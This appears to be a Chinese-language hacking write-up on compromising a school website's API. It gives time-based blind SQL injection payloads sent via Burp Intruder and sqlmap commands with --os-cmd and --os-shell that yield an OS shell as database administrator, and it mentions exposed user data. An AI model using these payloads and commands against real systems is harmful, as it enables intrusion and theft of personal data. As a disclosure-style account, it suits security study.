SQL注入+RCE|获取学校网站shell

alyssa

SQL注入
无意中发现一些数据是通过 API 获取的其实这种数据也很常见,就是其页面是一个XML文件)



所以这里启动了 Burp，并在battering模式下通过intruder发送了以下SQL盲注有效负载。

1. <p>' or sleep(5)#--</p><p>' or sleep(5)='</p><p>;waitfor delay '0:0:5'--</p><p>') or sleep(5)='</p>

复制代码

结果：

1. <p>;waitfor delay '0:0:5'--</p>

复制代码

这一条语句被执行。

数据库延迟了5秒钟返回了数据包。


请注意查看图片右下角的时间。（5193ms）

下面是延迟10秒






右下角时间戳（10114ms）



后面使用sqlmap这个工具，利用该工具，能看到所有的数据库。













数据库相当大，包含：用户名、密码、备份、地址、电话号码、电子邮件……



远程代码执行(RCE)
获取shell的方式很简单，这里使用sqlmap获取shell。

1. sqlmap -u "https://xxx.com/api/v1/StudentSomething?parameter1=9999" -H "Cookie: uni-cookie=MY-COOKIE-HERE"  --random-agent --os-cmd whoami

复制代码

sqlmap响应


返回了MSSQL的路径，且返回了我是DBA用户。（DBA：数据库管理员）

之后，进行shell尝试。

1. sqlmap -u "https://snoopy-college.tld/api/v1/StudentSomething?parameter1=9999" -H "Cookie: uni-cookie=MY-COOKIE-HERE"  --random-agent --os-shell

复制代码

如上所示，返回了shell。

黑帽黑客可能会滥用此功能来：

1. <p>破坏网站</p><p>关闭服务器/网站</p><p>提取服务器上的所有文件（使用FTP服务器或其他）</p><p>删除所有文件和目录</p>

复制代码